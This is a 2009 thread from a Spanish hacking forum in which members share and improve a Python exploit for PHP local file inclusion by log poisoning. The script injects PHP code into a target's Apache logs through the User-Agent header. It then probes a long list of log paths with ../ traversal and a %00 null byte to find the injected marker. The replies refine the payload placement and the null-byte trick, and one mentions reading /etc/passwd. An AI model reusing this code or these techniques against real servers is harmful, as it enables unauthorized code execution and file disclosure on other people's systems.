Exploit para LFI en python (infectando logs)

Tema destacado: Únete al Grupo Steam elhacker.NET

Foro de elhacker.net

Seguridad Informática

Hacking Avanzado (Moderadores: ANELKAOS, TRICKY)

Exploit para LFI en python (infectando logs)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Exploit para LFI en python (infectando logs) (Leído 2,870 veces)

braulio--

Wiki

Desconectado

Mensajes: 889

Imagen recursiva

Exploit para LFI en python (infectando logs)

« en: 10 Abril 2009, 00:48 »

Hola, les presento el "exploit" que he hecho basándome en el que está hecho en perl en este mismo subforo. No esta hecho del todo y podría mejorarlo para que sea mas facil de usar pero ya tengo sueño.

Código:

import socket, urllib2, string
host=raw_input("Host : ")
rutarfi=raw_input("Ruta : ")
socket = socket.socket()
socket.connect((host,80))

print "Conectado"
numero=0
CRLF ="\r\n"
path = "index.html"
navegador = "User-Agent:<h1>AQUI</h1> ######<? echo '<h1>Funciono</h1>' ; ?>"
cabeceras = "Get "+path+" HTTP/1.1"+CRLF+" Host:"+host+CRLF+navegador+CRLF * 2
listalogs = ["../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../apache/logs/error.log",
"../../../../../../../apache/logs/access.log",
"../../../../../../../etc/httpd/logs/acces_log",
"../../../../../../../etc/httpd/logs/acces.log",
"../../../../../../../etc/httpd/logs/error_log",
"../../../../../../../etc/httpd/logs/error.log",
"../../../../../../../var/www/logs/access_log",
"../../../../../../../var/www/logs/access.log",
"../../../../../../../usr/local/apache/logs/access_log",
"../../../../../../../usr/local/apache/logs/access.log",
"../../../../../../../var/log/apache/access_log",
"../../../../../../../var/log/apache2/access_log",
"../../../../../../../var/log/apache/access.log",
"../../../../../../../var/log/apache2/access.log",
"../../../../../../../var/log/access_log",
"../../../../../../../var/log/access.log",
"../../../../../../../var/www/logs/error_log",
"../../../../../../../var/www/logs/error.log",
"../../../../../../../usr/local/apache/logs/error_log",
"../../../../../../../usr/local/apache/logs/error.log",
"../../../../../../../var/log/apache/error_log",
"../../../../../../../var/log/apache2/error_log",
"../../../../../../../var/log/apache/error.log",
"../../../../../../../var/log/apache2/error.log",
"../../../../../../../var/log/error_log",
"../../../../../../../var/log/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/access_log"]
socket.send(cabeceras)
socket.close()
print "Logs infectados"
print "Buscando el log correcto..."

for log in listalogs:
url = "http://"+host+"/"+rutarfi+log+"%00"
web = urllib2.urlopen(url)
codigo = web.read()

if codigo.find("#####") >= 0:
print "Log encontrado\nEscribiendo la url en url.txt"
raw_input()
archivo=open("url.txt","w")
archivo.write(url)
archivo.close()
exit(1)
print "Logs no encontrados "
raw_input()

Si alguien enncuentra un fallo que lo ponga aqui, y si alguien me pudiera explicar como escribir la ultima parte del exploit de perl en python se lo agradeceria mucho.No está hecho del todo es solo un poc y todavia no lo he probado , cuando pueda usar mi ordenador con mi server lo probare.
Agradeezco todo tipo de consejos y correciones que me den


« Última modificación: 10 Abril 2009, 20:35 por braulio23 »	En línea

Crea tus propios códigos QR!

WHK

吴阿卡
Ex-Staff

Desconectado

Mensajes: 4.113

The Hacktivism is not a crime

Re: Exploit para LFI en python (infectando logs)

« Respuesta #1 en: 11 Abril 2009, 05:20 »

Hola, se ve bueno.. podrías poner en una variable esto: "../../../../../../../" para no tener que repetirla tantas veces.

No siempre se imprime en los logs el user agent pero si la request asi que en ves de poner index.html podrias pedir

Código

firma = "<h1>AQUI</h1> $$$<?php echo '<h1>Funciono</h1>'; ?>"
path = "index.php?x="+firma
navegador = "User-Agent: "+firma

Fijate que le puse "$" en ves de "#" porque en una petición GET ese carácter no es interpretado y el servidor te debolverá un error 400.

Recuerda también que "%00" un null byte puede causar un acceso denegado cuando el servidor tiene filtros (lo he visto) asi que podrías probar con el %00 y sin el.

También podrias dar la opción de querer escribir el resultado en un log o mostrarlo en pantalla:

Código

print "Log encontrado: "+url
exit(1)

Está bueno.


	En línea

Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!

braulio--

Wiki

Desconectado

Mensajes: 889

Imagen recursiva

Re: Exploit para LFI en python (infectando logs)

« Respuesta #2 en: 11 Abril 2009, 16:15 »

Cita de: WHK en 11 Abril 2009, 05:20

Fijate que le puse "$" en ves de "#" porque en una petición GET ese carácter no es interpretado y el servidor te debolverá un error 400

Muchas gracias Whk , eso no lo sabia, ahora mismo lo cambio.
Si alguien pudiera probarlo y me comentara los resultados se lo agradeceria mucho.


« Última modificación: 11 Abril 2009, 16:25 por braulio23 »	En línea

Crea tus propios códigos QR!

Data Seek3r

Desconectado

Mensajes: 33

Re: Exploit para LFI en python (infectando logs)

« Respuesta #3 en: 19 Abril 2009, 12:34 »

Me diste una gran idea, posiblemente lo emplee en Autoit, claro si es que no te importa.


	En línea

Network Criminals

braulio--

Wiki

Desconectado

Mensajes: 889

Imagen recursiva

Re: Exploit para LFI en python (infectando logs)

« Respuesta #4 en: 19 Abril 2009, 13:51 »

Úsalo, úsalo.


	En línea

Crea tus propios códigos QR!

дٳ⁪⁪⁪⁪⁪⁪⁪Ŧ٭

GNU/Linux Infrastructure Specialist
Ex-Staff

Desconectado

Mensajes: 5.089

Mtz De C.

Re: Exploit para LFI en python (infectando logs)

« Respuesta #5 en: 20 Abril 2009, 15:56 »

Pero amm perdón por la ignorancia xD pero apache puede leer esos archivos?, me imagino que sí pero el problema es que están fuera de la directiva del sitio. ¿?


	En línea

Con sangre andaluza

braulio--

Wiki

Desconectado

Mensajes: 889

Imagen recursiva

Re: Exploit para LFI en python (infectando logs)

« Respuesta #6 en: 20 Abril 2009, 17:44 »

Si , estan fuera de la directiva del sitio pero no del servidor.
De todas formas, si apache tiene permisos de lectura, podra verlos.
En los LFI , si es un servidor linux, es tipico mirar el "/etc/passwd"


	En línea

Crea tus propios códigos QR!

J0cker

Desconectado

Mensajes: 23

Re: Exploit para LFI en python (infectando logs)

« Respuesta #7 en: 28 Abril 2009, 22:26 »

Hola!

Lo que estaba buscando!!

Hay varios en la red pero este se ve mas entendible!! y mas sencillo!

Muy bueno amigo

solo una duda

Cita de: WHK en 11 Abril 2009, 05:20

Código

firma = "<h1>AQUI</h1> $$$<?php echo '<h1>Funciono</h1>'; ?>"
path = "index.php?x="+firma
navegador = "User-Agent: "+firma

Código

print "Log encontrado: "+url
exit(1)

Está bueno.

Terminaste de agregarle lo que te dijo WHK para que funcione al 100% ???

Solo una duda espero que no te moleste ::)

salu2!!!


	En línea

J0cker!!!

braulio--

Wiki

Desconectado

Mensajes: 889

Imagen recursiva

Re: Exploit para LFI en python (infectando logs)

« Respuesta #8 en: 30 Abril 2009, 14:26 »

Cita de: J0cker en 28 Abril 2009, 22:26

Terminaste de agregarle lo que te dijo WHK para que funcione al 100% ???

No, es que he estado haciendo otras cosas, cuando lo modifique, cambiare el titulo del post o algo asi.


	En línea

Crea tus propios códigos QR!

J0cker

Desconectado

Mensajes: 23

Re: Exploit para LFI en python (infectando logs)

« Respuesta #9 en: 3 Mayo 2009, 21:12 »

Cita de: braulio23 en 30 Abril 2009, 14:26

Cita de: J0cker en 28 Abril 2009, 22:26

Terminaste de agregarle lo que te dijo WHK para que funcione al 100% ???

No, es que he estado haciendo otras cosas, cuando lo modifique, cambiare el titulo del post o algo asi.

Vas Gracias


	En línea

J0cker!!!

Páginas: [1]

Ir a: